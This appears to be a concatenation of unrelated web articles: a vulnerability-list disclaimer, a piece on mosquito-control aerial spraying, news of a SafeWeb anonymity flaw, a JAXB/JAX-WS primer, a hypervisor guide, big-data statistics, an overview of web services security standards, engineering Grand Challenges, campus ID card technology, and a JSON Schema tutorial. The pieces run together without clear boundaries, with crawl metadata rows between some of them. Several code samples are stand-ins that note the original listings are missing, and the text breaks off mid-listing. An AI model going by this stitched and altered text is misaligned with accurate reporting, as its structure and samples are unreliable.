Please note that this common list of terms, while both useful and informative, does not focus on exploits (and hence will not respond to many virus, worm or Trojan names, no matter how well publicized or virulent they may be or have been). It focuses on vulnerabilities and exposures. Thus, searching the list depends on knowing about the vulnerabilities or exposures that make exploits possible, rather than working directly from those exploits themselves. Those interested in working from exploit information will be better served by searching the virus encyclopedias at VirusList.com or Symantec’s SecurityResponse Web pages.
On the hot and humid Florida Keys, aerial spraying plays a vital role in controlling the mosquito population. The Florida Keys Mosquito Control District uses advanced computer modeling and sophisticated technology to attack breeding grounds for these airborne pests.
District activities are divided into two functions: spraying for existing mosquitoes, and spotting and eliminating larva sites in the water.
Both tasks rely on helicopter flights and a sophisticated spray management system that guides the pilot to the right areas and records the concentration of pesticide being released.
Flight and spray patterns are determined at the district office and saved onto a memory card, which is uploaded to the helicopter’s onboard system. For larva sites, inspectors note locations by hand, and that data is placed on digital maps.
While in flight, an automated system consisting of two GPS antennae and a wind measurement probe records data and monitors the wind speed and aircraft direction. Spraying goes on and off automatically to ensure the cloud drifts over the appropriate area.
“The pilot just has to go to the spray area, activate the unit, and it’ll set up the first line,” said Stephen Bradshaw, the district’s aerial operations supervisor. “It’ll show the pilot where to go so the product will drift across the spray area and be more effective.”
The district also plans to upgrade its land-based technology. Instead of having inspectors report larva site findings manually, the agency is seeking a tablet or smartphone system to enter the information digitally. This way, data is directly entered on the map pilots will use to direct their spraying.
Two researchers discovered a flaw in the SafeWeb anonymity service: David Martin, a computer science professor at Boston University, and Andrew Schulman, a researcher at the Privacy Foundation. Martin and Schulman showed how they were able to trick a Web browser into divulging a user's IP address and cookie information. Political dissidents, consumers and government agencies use SafeWeb to protect their Web activity online.
"We have found that the SafeWeb service is seriously and fundamentally flawed," said Schulman. "Our paper documents spectacular failures of the service, based on extremely simple attacks."
SafeWeb was aware of the problems as early as last year, said co-founder and chief executive Stephen Hsu, but the company decided not to develop repairs after abandoning its consumer business and licensing its technology to PrivaSec in August.
PrivaSec chief executive Geoffrey Riggs acknowledged that "there are certain vulnerabilities to SafeWeb and SurfSecure secure surfing technology" and added that the company is working to develop patches. PrivaSec claimed that the "likelihood of such an attack on a user living in a free, non-politically-repressed society is relatively low."
Martin criticised this approach. "Frankly, I can't think of any other security system that is considered secure by nature of it being unlikely to be attacked," he said.
SafeWeb is used by thousands of politically oppressed people around the world to shield their Web activities.
JAX is a common umbrella term for the JAXB and JAX-WS technologies, which are the basic building blocks of Web services. A Web service is a distributed web application that uses open XML-based standards and transport protocols to exchange data between remote devices. Starting with Java 6, these fundamental Web service classes are bundled within the JDK itself. The main intention is to support Web service development without needing an application container like Tomcat or WebSphere. The JDK also bundles a lightweight Web service container for hosting Web services during testing.
1) What is JAXB?
JAXB stands for Java Architecture for XML Binding. JAXB makes it easier to transform and access data from XML within Java, and to create XML from the corresponding Java objects. For JAXB, the JDK provides APIs (javax.xml.bind), compiler tools (xjc and schemagen), and a framework implementation that automates the mapping between:
a) in-memory Java objects to XML
b) XML to in-memory Java objects.
(a) is commonly called JAXB marshalling, while (b) is commonly called JAXB unmarshalling. JAXB marshalling gives a client application the ability to convert a JAXB-derived Java object tree back into XML data. Marshalling can be compared to object serialization, where a Java object is converted into a network-friendly form. JAXB unmarshalling gives a client application the ability to convert XML data into JAXB-derived Java objects, and can be compared to object deserialization, where object bytes transmitted over the network are converted back into Java objects.
JAXB provides an efficient and standard way of mapping between XML and Java objects. Compared to parsing XML with DOM or SAX, JAXB has a smaller memory footprint: it creates objects on demand and thus uses memory efficiently.
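JAXB generates this mapping for you from schema-derived, annotated classes; with the real API you would annotate a class (for example with @XmlRootElement) and hand instances to javax.xml.bind's Marshaller and Unmarshaller. Purely to illustrate what the round trip amounts to, here is a hand-written sketch for a hypothetical Customer class — the class and XML shape are made up, and no JAXB code appears:

```java
// Hand-rolled illustration of what JAXB marshalling/unmarshalling produce
// for a simple object. The real API automates this from annotations.
public class MarshalSketch {
    public static class Customer {
        public String name;
        public int id;
        public Customer(String name, int id) { this.name = name; this.id = id; }
    }

    // "Marshal": object tree -> XML text.
    public static String marshal(Customer c) {
        return "<customer><name>" + c.name + "</name><id>" + c.id + "</id></customer>";
    }

    // "Unmarshal": XML text -> object tree (naive string slicing for brevity).
    public static Customer unmarshal(String xml) {
        String name = xml.substring(xml.indexOf("<name>") + 6, xml.indexOf("</name>"));
        int id = Integer.parseInt(xml.substring(xml.indexOf("<id>") + 4, xml.indexOf("</id>")));
        return new Customer(name, id);
    }

    public static void main(String[] args) {
        String xml = marshal(new Customer("Ada", 7));
        System.out.println(xml);
        Customer back = unmarshal(xml);
        System.out.println(back.name + " " + back.id);
    }
}
```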
2) What are all JAXB Compilers tools?
JAXB compilers are used to generate JAXB artifacts, which are essential at run time for marshalling and unmarshalling.
i) xjc: generates fully annotated Java classes from an XML schema file.
usage: xjc [-options ...] <schema file>
ii) schemagen: generates a schema file from JAXB-annotated Java classes.
usage: schemagen [-options ...] [java source files]
3) What is JAX-WS technology?
JAX-WS stands for Java API for XML Web Services, a technology that helps build client-server Web services. Under the hood, JAX-WS implementations use JAXB for the XML-to-Java and Java-to-XML conversions involved in Web service communication. Older Web service implementations were based on remote procedure calls (RPC), which used RMI underneath. JAX-WS hides all SOAP operations from the Web service developer, who does not need in-depth SOAP knowledge unless a problem arises that requires debugging.
Because JAX-WS is built on open standards, a JAX-WS (Java) client can access any other compatible service provider, whether that service is implemented in Java or in .NET. This is feasible because JAX-WS uses technologies defined by the World Wide Web Consortium (W3C): HTTP, SOAP, and the Web Services Description Language (WSDL). WSDL specifies an XML format for describing a service as a set of endpoints operating on messages.
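To make the hidden SOAP layer a little more concrete, the sketch below assembles a bare-bones SOAP 1.1 envelope by hand. The getQuote operation and its namespace are made-up examples; in practice the JAX-WS runtime generates and parses messages like this for you:

```java
// Builds a minimal SOAP 1.1 request envelope, just to show the kind of XML
// the JAX-WS runtime exchanges on the wire. Not a substitute for the runtime.
public class SoapEnvelopeSketch {
    public static String request(String operation, String namespace, String body) {
        return "<soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">"
             + "<soap:Body>"
             + "<" + operation + " xmlns=\"" + namespace + "\">" + body + "</" + operation + ">"
             + "</soap:Body>"
             + "</soap:Envelope>";
    }

    public static void main(String[] args) {
        // Hypothetical stock-quote operation, purely for illustration.
        System.out.println(request("getQuote", "http://example.com/stock",
                "<symbol>IBM</symbol>"));
    }
}
```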
4) What are all JAX-WS tooling supported by JDK?
Like the JAX-RPC tooling, the JAX-WS tooling provides tools to help with both bottom-up (wsgen) and top-down (wsimport) development approaches.
i) wsgen (with JAX-RPC this was called java2wsdl)
The wsgen tool helps generate Web service artifacts from an annotated Java class. It produces, from the annotated class, the Java classes required to build the WSDL.
Usage: wsgen [-options] [Java service class (SEI)]
ii) wsimport (with JAX-RPC this was called wsdl2java)
The wsimport tool helps you write a Java Web service client by generating client artifacts from a WSDL file.
Usage: wsimport [-options] [WSDL file]
Virtualization improves IT resource utilization by treating your company's physical resources as pools from which virtual resources can be dynamically allocated.
Virtualization involves a shift in thinking from physical to logical, treating IT resources as logical resources rather than separate physical resources. Using virtualization in your environment, you are able to consolidate resources such as processors, storage, and networks into a virtual environment which provides the following benefits:
- Consolidation to reduce hardware cost.
- Optimization of workloads.
- IT flexibility and responsiveness.
Virtualization is the creation of flexible substitutes for actual resources — substitutes that have the same functions and external interfaces as their actual counterparts but that differ in attributes such as size, performance, and cost. These substitutes are called virtual resources; their users are typically unaware of the substitution.
Virtualization is commonly applied to physical hardware resources by combining multiple physical resources into shared pools from which users receive virtual resources. With virtualization, you can make one physical resource look like multiple virtual resources.
Furthermore, virtual resources can have functions or features that are not available in their underlying physical resources.
System virtualization creates many virtual systems within a single physical system. Virtual systems are independent operating environments that use virtual resources. Virtual systems running on IBM® systems are often referred to as logical partitions or virtual machines. System virtualization is most commonly implemented with hypervisor technology.
Hypervisors are software or firmware components that can virtualize system resources.
Figure 1. Virtualization, a shift in thinking from the physical to the logical
Now let's look at the types of hypervisors.
Hypervisors in general
There are two types of hypervisors:
- Type 1 hypervisor
- Type 2 hypervisor
Type 1 hypervisors run directly on the system hardware. Type 2 hypervisors run on a host operating system that provides virtualization services, such as I/O device support and memory management. Figure 2 shows how type 1 and type 2 hypervisors differ.
Figure 2. Differences between type 1 and 2 hypervisors
The hypervisors described in this series are supported by various hardware platforms and in various cloud environments:
- PowerVM: A feature of IBM POWER5, POWER6, and POWER7 servers, support provided for it on IBM i, AIX®, and Linux®.
- VMware ESX Server: A "bare metal" embedded hypervisor, VMware ESX's enterprise software hypervisors run directly on server hardware without requiring an additional underlying operating system.
- Xen: A virtual-machine monitor for IA-32, x86-64, Itanium, and ARM architectures, Xen allows several guest operating systems to execute on the same computer hardware concurrently. Xen systems have a structure with the Xen hypervisor as the lowest and most privileged layer.
- KVM: A virtualization infrastructure for the Linux kernel, KVM supports native virtualization on processors with hardware virtualization extensions. Originally, it supported x86 processors, but now supports a wide variety of processors and guest operating systems including many variations of Linux, BSD, Solaris, Windows®, Haiku, ReactOS, and the AROS Research Operating System (there's even a modified version of qemu that can use KVM to run Mac OS X).
- z/VM: The current version of IBM's virtual machine operating systems, z/VM runs on IBM's zSeries and can be used to support large numbers (thousands) of Linux virtual machines.
All of these hypervisors are supported by IBM hardware.
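As a small illustration of the hardware-extension requirement mentioned for KVM: on Linux, Intel VT-x shows up as the vmx CPU flag and AMD-V as svm in /proc/cpuinfo. The sketch below parses a cpuinfo-style flags line supplied as a string (rather than reading the live file) so the example is self-contained:

```java
// Detects hardware virtualization support from a cpuinfo-style flags line.
public class VirtFlags {
    public static String detect(String flagsLine) {
        for (String flag : flagsLine.trim().split("\\s+")) {
            if (flag.equals("vmx")) return "Intel VT-x";
            if (flag.equals("svm")) return "AMD-V";
        }
        return "no hardware virtualization extensions";
    }

    public static void main(String[] args) {
        System.out.println(detect("fpu vme de pse tsc msr pae vmx sse2"));
        System.out.println(detect("fpu vme de pse tsc msr pae sse2"));
    }
}
```

On a real system you would read the flags line from /proc/cpuinfo and pass it to detect().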
The individual linked articles describe in detail the features, functionalities, and methods to deploy and manage the virtual systems with corresponding hypervisors.
Choosing the right hypervisor
One of the best ways to determine which hypervisor meets your needs is to compare their performance metrics. These include CPU overhead, amount of maximum host and guest memory, and support for virtual processors.
But metrics alone should not determine your choice. In addition to the capabilities of the hypervisor, you must also verify the guest operating systems that each hypervisor supports.
If you are running heterogeneous systems in your service network, then you must select the hypervisor that has support for the operating systems you currently run. If you run a homogeneous network based on Windows or Linux, then support for a smaller number of guest operating systems might fit your needs.
All hypervisors are not made equal, but they all offer similar features. Understanding the features they have as well as the guest operating systems each supports is an essential aspect of any hardware virtualization hypervisor selection process. Matching this data to your organization's requirements will be at the core of the decision you make. (To get started with this process, explore the details of each hypervisor.)
The following factors should be examined before choosing a suitable hypervisor.
Virtual machine performance
Virtual systems should meet or exceed the performance of their physical counterparts, at least in relation to the applications within each server. Everything beyond meeting this benchmark is profit.
Ideally, you want each hypervisor to optimize resources on the fly to maximize performance for each virtual machine. The question is how much you might be willing to pay for this optimization. The size or mission-criticality your project generally determines the value of this optimization.
Look for support for hardware-assisted memory virtualization. Memory overcommit and large page table support in the VM guest and hypervisor are preferred features; memory page sharing is an optional bonus feature you might want to consider.
Each major vendor has its own high availability solution and the way each achieves it may be wildly different, ranging from very complex to minimalist approaches. Understanding both the disaster prevention and disaster recovery methods for each system is critical. You should never bring any virtual machine online without fully knowing the protection and recovery mechanisms in place.
Live migration is extremely important for users; along with support for live migration across different platforms and the capability to simultaneously live migrate two or more VMs, you need to carefully consider what the individual hypervisor offers in this area.
Networking, storage, and security
In networking, hypervisors should support network interface cards (NICs) teaming and load balancing, Unicast isolation, and support for the standard (802.1Q) virtual local area network (VLAN) trunking.
Each hypervisor should also support iSCSI- and Fibre Channel-networked storage and enterprise data protection software support with some preferences for tools and APIs, Fibre Channel over Ethernet (FCoE), and virtual disk multi-hypervisor compatibility.
Look for such management features as Simple Network Management Protocol (SNMP) trap capabilities, integration with other management software, and fault tolerance of the management server — these features are invaluable to a hypervisor.
A few suggestions ...
Now I don't want to influence your choice of hypervisor (after all, your needs and requirements are unique), but here are a few general suggestions from my experience with implementation of hypervisors for cloud-based workloads:
- For UNIX®-based workloads, business-critical applications comprised of heavy transactions where performance is the paramount requirement, the PowerVM hypervisor is capable of handling that sort of load.
- If you're running business-critical applications on System X (x86 servers for Windows and Linux), VMware ESX works quite well.
- If your applications aren't particularly business critical, you might try KVM or Xen (the startup costs for these is relatively inexpensive too).
You can even try out some of the freeware VMs like Xen and KVM.
IT managers are increasingly looking at virtualization technology to lower IT costs through increased efficiency, flexibility, and responsiveness. As virtualization becomes more pervasive, it is critical that virtualization infrastructure can address the challenges and issues faced by an enterprise datacenter in the most efficient manner.
Any virtualization infrastructure looking for mainstream adoption in data centers should offer the best-of-breed combination of several important enterprise readiness capabilities:
- Ease of deployment
- Manageability and automation
- Support and maintainability
- Reliability, availability, and serviceability
This article introduced the concept of system virtualization and hypervisors, demonstrated the role a hypervisor plays in system virtualization, and offered some topic areas to consider when choosing a hypervisor to support your cloud virtualization requirements.
Links for this series:
- The PowerVM site.
- Red Hat Enterprise Virtualization 3.0 Administration Guide.
- VMware's Quick Start Guide version 5.17 | version 4.15.
- VMware vSphere overview.
- Getting Started with Xen Deployment online book.
- List of KVM documentation.
- Red Hat Enterprise Virtualization 3.0 Administration Guide (for help with KVM).
- IBM Director's Virtualization Manager can let you manage all your z/VM virtualized systems from the same console.
The Staggering Scope of Big Data
The amount of data we're all generating at any given time is astronomical. Jump on the big-data train or risk getting left behind.
So you've been hearing about storage lately, maybe a lot. Well, that shouldn't come as too much of a surprise. Storage is a hot category for a lot of reasons, but the main driver of demand for storage is something that has now become a familiar buzz phrase: big data.
Simply put (and it's scary to think that anybody in IT wouldn't know this), massive data growth is driving a panicked scramble for storage solutions. But how massive is this growth in data volume? It's incomprehensible, actually, or nearly so.
Let's take a look at some of the numbers that make up big data. A summary from Villanova University offers a few numbers:
- Users create 2.5 quintillion bytes of data every day. Essentially, this means that 90 percent of the data in the world today has been created in the last two years alone.
- Retailer Walmart alone handles more than 1 million customer transactions every hour -- and then transfers them all to a database that stores more than 2.5 petabytes of information.
- There are 45 billion photographs (and counting) in Facebook's database. That's more than six photos for every human being on earth.
But wait...there's more. According to Domo, a business-intelligence firm, every 60 seconds, technology users:
- Send 204 million e-mails;
- Upload 3000 videos to YouTube;
- Tweet 100,000 times;
- Download 47,000 applications from an app store.
And those numbers are already old. They were old the first time somebody typed them. So, are we humans just that much smarter than we used to be? Do we just know that much more? Maybe, but one of the drivers of big data is the storage of increasingly massive file types -- think MRIs and sonograms.
Then there are government regulations, social media, the proliferation of online video, streaming-video services, blogs about storage... The stuff we're storing is just bigger, broader and greater in volume than it has ever been before. That's all there is to it.
So, what does this all mean? Well, for one thing, now would be a good time to acquire skills in working with big data. There will soon -- within the next few years -- be significant shortages of IT people who know how to handle big data. And then there's the investment that big data will require. That brings us full circle to our discussion of storage. All of this stuff has to go somewhere and be accessible and recoverable -- and soon.
It's not that IT professionals don't know all this. It's just that the numbers provide a stark reminder of the onslaught of big data that's happening right now and a harbinger of what's to come. Get ready. | <urn:uuid:61960ab1-87a1-4dea-bb14-9c489aa28094> | CC-MAIN-2017-04 | https://esj.com/articles/2014/04/29/scope-of-big-data.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284352.26/warc/CC-MAIN-20170116095124-00565-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.95393 | 605 | 2.921875 | 3 |
Securing Web Services
Today’s business demands an infrastructure that supports mission-critical Web services. Web sites are no longer about just providing information about a business, but increasingly are being positioned to deliver Web services—via both intranets and extranets. The challenge in providing Web services is security—how to manage users effectively while protecting access to sensitive business or consumer information. Security professionals and architects are increasingly finding themselves developing solutions that enable secure access to Web-based resources.
Businesses across almost all vertical industries are moving more and more of their business processes online. The e-business objective is to reach new markets and new users, increase revenues, reduce costs, reduce response times and enhance the customer experience with the organization. This requires providing online, real-time access to sensitive information for customers, employees and business partners. The challenge for the organization is how to provide such access so as to further enable the business, yet define and enforce Web-access privileges to limit exposure to authorized entities only.
What Is a Web Service?
Web services enable businesses to deliver business applications to customers, partners and employees over the Internet. The Web-service consumer or client makes the request and gets a response from one or more Web-service providers. The Web-service provider receives the request and sends the response to the consumer or client. The data format that enables this communication between the consumer or client and the provider is the extensible markup language (XML). The XML Schema is the framework that describes XML vocabularies used in business transactions.
The challenge with Web services is how to secure the exchange of information between the consumer and the provider. There are a few organizations that are influencing standards in the area of Web services security. These organizations include:
- World Wide Web Consortium (W3C)
- Organization for the Advancement of Structured Information Standards (OASIS)
- Liberty Alliance
- Web Services Interoperability Organization (WS-I)
The World Wide Web Consortium (W3C) was established in 1994 with the objective of creating standards for the Web. It is supported by more than 450 members and about 70 full-time employees. It is famous for introducing standards such as HTTP and HTML. W3C is involved in Web services activities as an extension of its core standards, such as XML. See www.w3c.org for more information.
Founded in 1993 under the name SGML Open, the Organization for the Advancement of Structured Information Standards (OASIS) developed the security assertions markup language (SAML) standard. SAML is an XML framework for exchanging authentication and authorization information. OASIS has more than 600 corporate and individual members in 100 countries around the world. OASIS and the United Nations jointly sponsor ebXML (www.ebxml.org), a global framework for e-business data exchange. More information on OASIS is available at www.oasis-open.org.
The Liberty Alliance Project was formed in September 2001 with the objective of developing specifications in the area of identity management to enable the deployment of identity-based Web services. The Liberty Alliance Project has adopted SAML 1.1 as the foundation for its work on Federated Identity. Federated Identity allows users to link identity information between accounts without centrally storing personal information. The user can control when and how his accounts and attributes are linked and shared between domains and service providers, allowing for greater control over his personal data. In practice, this means that users can be authenticated by one company or Web site and be recognized and delivered personalized content and services in other locations without having to re-authenticate or sign on with a separate user name and password.
The Liberty Alliance Project membership includes VeriSign, Sony, Sun, HP, GM, Nokia, Netegrity, RSA Security and many others. More information on the Liberty Project Alliance is available at www.projectliberty.org.
Formed in February 2002, the Web Services Interoperability Organization (WS-I) is focused on providing consistent and reliable interoperability among Web services across platforms, applications and programming languages. WS-I recently introduced the Basic Profile 1.0. The Basic Profile 1.0 consists of implementation guidelines on how core Web services specifications should be used together to develop interoperable Web services. The specifications covered by the Basic Profile include SOAP 1.1, WSDL 1.1, UDDI 2.0, XML 1.0 and XML Schema. More information on the WS-I is available at www.ws-i.org.
Core Web Services Standards
There are four standards that provide the foundation for Web services. They are
- Extensible markup language (XML)
- Simple object access protocol (SOAP)
- Web services description language (WSDL)
- Universal description, discovery and integration (UDDI)
Created by the W3C, XML is what enables the flexibility of Web services. It makes it straightforward to develop customized markup languages that define how information is to be structured and processed. It is the lingua franca of Web services. All Web services communicate in XML.
SOAP is an XML-based messaging protocol that provides a uniform way to exchange XML-formatted information using HTTP. It is a communications protocol for Web services.
Developed by the W3C, WSDL defines methods for creating detailed descriptions of Web services. It is an XML-based language for describing, finding and using Web services.
UDDI provides a method for publishing service descriptions so Web services can be located and accessed by other Web services. It is a phone directory for Web services that lists available Web services from different companies, their descriptions and instructions for using them.
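To make the relationship between these standards concrete, the snippet below assembles a minimal SOAP 1.1 envelope as a string in JavaScript. The envelope namespace is the standard SOAP 1.1 one, but the operation and payload namespace (getQuote, urn:example:stock) are hypothetical; in practice the request would be described by a WSDL document and posted over HTTP.

```javascript
// A minimal SOAP 1.1 request envelope, built as a string.
// Only the soap:Envelope namespace is standard; the body payload is made up.
function soapEnvelope(bodyXml) {
  return '<?xml version="1.0" encoding="UTF-8"?>' +
    '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">' +
    '<soap:Body>' + bodyXml + '</soap:Body>' +
    '</soap:Envelope>';
}

var request = soapEnvelope(
  '<getQuote xmlns="urn:example:stock"><symbol>IBM</symbol></getQuote>'
);
console.log(request.indexOf('<soap:Body>') !== -1); // true
```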
Security Assertions Markup Language (SAML)
The security assertions markup language (SAML) is an XML-based framework that enables Web services to readily exchange information relating to authentication and authorizations. SAML enables single sign-on, providing the ability to use a variety of Internet resources without having to log in repeatedly. SAML is a Web-services-based request/reply protocol for the exchange of authentication, attribute and authorization decision statements.
SAML takes the information in the form of trusted statements, referred to as security assertions, about end-users, Web services or any other entity that can be assigned a digital identity. SAML “buffers” the application from the complexity of the underlying authentication and authorization systems. Security assertion is a primary objective of the SAML specification. A security assertion is a claim or statement regarding the security properties of a given end-user that one organization needs to pass to another organization. Examples of types of security assertions are:
- Authentication assertion
- Authorization decision assertion
- Requesting assertion
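As an illustration of what an authentication assertion carries, here is a skeletal SAML 1.1-style assertion assembled as a JavaScript string. The issuer and subject values are hypothetical, and a real assertion would also include timestamps, conditions, and a digital signature.

```javascript
// Skeleton of a SAML 1.1 authentication assertion (illustrative only;
// issuer and subject are made up).
var assertion =
  '<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:1.0:assertion"' +
  ' Issuer="https://idp.example.org">' +
  '<saml:AuthenticationStatement' +
  ' AuthenticationMethod="urn:oasis:names:tc:SAML:1.0:am:password">' +
  '<saml:Subject><saml:NameIdentifier>alice</saml:NameIdentifier>' +
  '</saml:Subject>' +
  '</saml:AuthenticationStatement>' +
  '</saml:Assertion>';

console.log(assertion.indexOf('AuthenticationStatement') !== -1); // true
```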
SAML has received widespread support from the industry, including from Sun, IBM, HP, BEA Systems and RSA Security. The U.S. Navy is adopting it as the standard for supporting authentication and authorization of end-users for Web services.
Solution Questions to Consider
There are several vendors that offer solutions in this area. Some questions to consider as you review possible vendors’ solutions are: | <urn:uuid:7f91d375-2d5c-4e33-ab02-ef895a1e2a81> | CC-MAIN-2017-04 | http://certmag.com/securing-web-services/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280280.6/warc/CC-MAIN-20170116095120-00291-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.91022 | 1,472 | 2.6875 | 3 |
It’s going to take more than a village of engineers to address the most complex and critical needs of 21st century society, and today more than 120 of the country’s engineering schools said they would pump out a community of engineers explicitly equipped to tackle those problems.
Each of the 122 schools from Brown to Youngstown State has pledged to graduate a minimum of 20 students per year who will be specially prepared to lead the way in solving such large-scale problems, with the goal of training more than 20,000 formally recognized “Grand Challenge Engineers” over the next decade, the group stated in a letter to President Obama.
+ More on Network World: The weirdest, wackiest and coolest sci/tech stories of 2014+
The Grand Challenges which were developed by the National Academy of Engineering and National Science Foundation a few years ago include:
* Make solar energy affordable
* Provide energy from fusion
* Develop carbon sequestration methods
* Manage the nitrogen cycle
* Provide access to clean water
* Restore and improve urban infrastructure
* Advance health informatics
* Engineer better medicines
* Reverse-engineer the brain
* Prevent nuclear terror
* Secure cyberspace
* Enhance virtual reality
* Advance personalized learning
* Engineer the tools for scientific discovery
According to the group, the training model was inspired by the National Academy of Engineering-endorsed Grand Challenge Scholars Program (GCSP), established in 2009 by Duke’s Pratt School of Engineering, Olin College, and the University of Southern California’s Viterbi School of Engineering in response to the NAE’s 14 Grand Challenges for Engineering in the 21st century.
There are currently 20 active GCSPs and more than 160 NAE-designated Grand Challenge Scholars have graduated to date. Half of the graduates are women—compared with just 19% of U.S. undergraduate engineering students—demonstrating the program’s appeal to groups typically underrepresented in engineering, the group stated.
Check out these other hot stories: | <urn:uuid:ddcfad09-c50c-4394-854f-c0359af6c5cc> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2901039/careers/building-superior-engineers-to-address-the-century-s-greatest-engineering-challenges.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280723.5/warc/CC-MAIN-20170116095120-00199-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.937341 | 422 | 3.15625 | 3 |
by: David Stallsmith
Senior Product Manager of Advanced Technology Cards
About 40 years ago, the first campus card was used to monitor access to a university dining hall. A few years later, the mag stripe card was introduced to the university campus. Since then, university ID cards have become as important as backpacks and blue jeans on campuses around the world.
One of the challenges for card offices, security, dining services, housing and IT personnel has been to decide which technologies will make their cards most successful and cost-effective on their campus. In the days of mag stripes and bar codes, this question usually answered itself. But now, with a multitude of chips available for cards, both contact and contactless, the decision has become more difficult.
Although ID cards were first used for meal plans, it wasn't long before they began to be used to open doors (physical access). Following the lead of the hotel industry, the predominant technology used for physical access was the magnetic stripe. Also used widely for credit cards, the magnetic stripe card is fairly inexpensive and easy to program. The swipe readers on the doors around a campus could be in either online or offline mode.
Until recently, the magnetic stripe was considered secure enough for this physical access. Unfortunately, magnetic stripes have no particular inherent security and are very easy to duplicate. This is not considered a problem for the credit cards that we carry every day, because the credit card issuers (Visa, MasterCard) will not require us to pay for unauthorized purchases. This is a guarantee by the issuer and not a result of the security of the magnetic stripe. For the physical safety of the university population however, the magnetic stripe is now known to be insufficient. Recently, a number of universities have found their names in the local or national newspapers after a student had "cloned" the magnetic stripe card of a prominent university official or fellow student, and breached the system.
About 20 years ago, Prox cards with radio frequency IC chips were introduced. Transmitting at 125 kHz, they provided a much higher level of security than magnetic stripes. Not as easy to clone as a magnetic stripe card, Prox cards have nevertheless become vulnerable to attacks as their technology has aged.
Recently, the Prox chip has been eclipsed by a new class of radio frequency chips used in high-frequency "contactless smart cards". Though they are used at the door in much the same manner as Prox cards, they operate at 13.56 MHz. Mifare, Legic and HID's iCLASS fall into this category. These chips provide a significantly more secure card-reader interface than the old Prox chips and their readers. Before the transmission of encrypted personal data, there is a challenge-and-response sequence of communications, through which the card and reader verify that each other is trustworthy for this transaction. Data stored on the card is also encrypted. A significant benefit of contactless over magnetic stripe cards is that the cards are not dragged through swipe readers, which is very damaging to the surface of the cards.
As a university considers changing to a card containing one of the newer technology chips, cost is certainly an important factor in the decision. Any card with a chip in it will be more expensive than a plain PVC card or even a mag stripe card. Installing new or replacing existing readers brings with it the costs of new readers and installation. Fortunately, new contactless card readers can often be installed in the place of existing prox or magnetic stripe readers with no significant change to the existing wiring or mounting box. There is a protocol for security wiring called "Wiegand" and it is an industry standard for many different types of readers. As plans are being made to upgrade an infrastructure, looking into the future reveals two new trends in card reader technology: Wireless contactless readers (Wi-Fi - 802.11), which can be installed in locations that are difficult or expensive to reach with wires; and IP-addressable network readers, which can be employed to interface directly with software and replace old control panels.
In future articles, I will discuss the workings of high frequency contactless cards and the new possibilities they bring for campus card use. Learn more about contactless cards here = Advanced Technology Cards, contact us Toll Free 888-682-6567 or email us at Support@colorid.com.
ColorID is a leading identification solutions provider to education, government, military, healthcare and other businesses. ColorID product offerings include: ID printers, software and supplies, advanced technology smart contact and contactless cards, biometric iris and finger print readers, pre-printed and blank plastic cards, and ID badge accessories (such as lanyards and card holders). ColorID offers installation, training, re-carding, extended warranties and support services on all the products we offer. ColorID's manufacturing partners include: HID, Fargo, IRIS ID, Datacard, Gemalto, Zebra, NiSCA, Evolis, Magicard, Integrated Biometrics, Oberthur, Privaris and many others. Contact ColorID at 704-987-2238 or toll free in Canada and the US at 888-682-6567. Visit ColorID on the web at: www.ColorID.com or email ColorID at email@example.com.
AJAX applications depend upon JSON services conforming to expectations. Unexpected behavior can occur if services provide responses in an unexpected format or with invalid content. For complex applications, you can mitigate the risk of unexpected behavior by implementing custom routines to validate service responses. Alternatively, you can exploit JSON Schema to validate input.
JSON Schema is a draft standard that specifies a JSON-based format for defining the structure of JSON data. As of this writing, the latest is draft-03 (see Resources).
This article compares a few of the JSON Schema validation routines. Learn to use the foremost libraries, and explore considerations and best practices for creating libraries to validate communications. The article also includes a new utility to help you write JSON Schemas.
Download the samples used in this article.
Choosing a library for your application
| Library (Author) | Draft versions supported | Approximate library size |
| --- | --- | --- |
| JSV: JSON Schema Validator (Gary Court) | draft-01, draft-02, draft-03 | 120KB |
| json-schema (Kris Zyp) | draft-03 | 10KB (requires CommonJS) |
| dojox.json.schema (Kris Zyp) | draft-02 | 10KB (requires Dojo) |
| schema.js (Andreas Kalsch) | draft-02 (partial) | 10KB (requires CommonJS) |
An application based on Dojo might use the dojox.json.schema library because it is included in the toolkit. An application that needs to support multiple versions of the (draft) standard may use JSV.
dojox.json.schema appears to be a fork of json-schema, so usage is similar. schema.js implements only a subset of draft-02. This article concentrates on examples for using dojox.json.schema and JSV.
Listing 1 shows an HTML snippet that validates a simple object. It is designed to be injected into the head HTML element.
Listing 1. Single use of dojox.json.schema
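The listing body is not reproduced here, so the following sketch shows the typical call pattern. A real page would load Dojo and call dojox.json.schema.validate(instance, schema); a minimal stand-in with the same signature is defined inline so the snippet runs on its own. The stand-in checks only the top-level type and non-optional properties, which is far less than the real library does.

```javascript
// Stand-in for dojox.json.schema.validate (NOT the real library):
// returns { valid, errors } the way the Dojo implementation does.
var dojox = { json: { schema: {
  validate: function (instance, schema) {
    var errors = [];
    if (schema.type === "object" &&
        (typeof instance !== "object" || instance === null)) {
      errors.push({ property: "", message: "not an object" });
    }
    var props = schema.properties || {};
    for (var name in props) {
      if (!props[name].optional && !(name in instance)) {
        errors.push({ property: name, message: "is missing and it is not optional" });
      }
    }
    return { valid: errors.length === 0, errors: errors };
  }
}}};

// draft-02 style schema: properties are required unless marked optional.
var schema = {
  type: "object",
  properties: {
    name: { type: "string" },
    age:  { type: "integer", optional: true }
  }
};

var result = dojox.json.schema.validate({ name: "Ada" }, schema);
console.log(result.valid);                                  // true
console.log(dojox.json.schema.validate({}, schema).valid);  // false
```

In an actual Dojo page you would dojo.require("dojox.json.schema") and call the library's validate function in exactly this way.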
Listing 2 is an HTML snippet that validates a simple object. It is designed to be injected into the head HTML element.
Listing 2. Single use of JSV
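Again the listing body is not reproduced here, so this sketch shows the JSV call pattern: JSV.createEnvironment() followed by env.validate(json, schema). A minimal stand-in environment is defined inline so the snippet runs without the library; it reports only missing required properties, using error objects shaped like the fields JSV documents (message, uri, schemaUri, attribute, details), with made-up URI values.

```javascript
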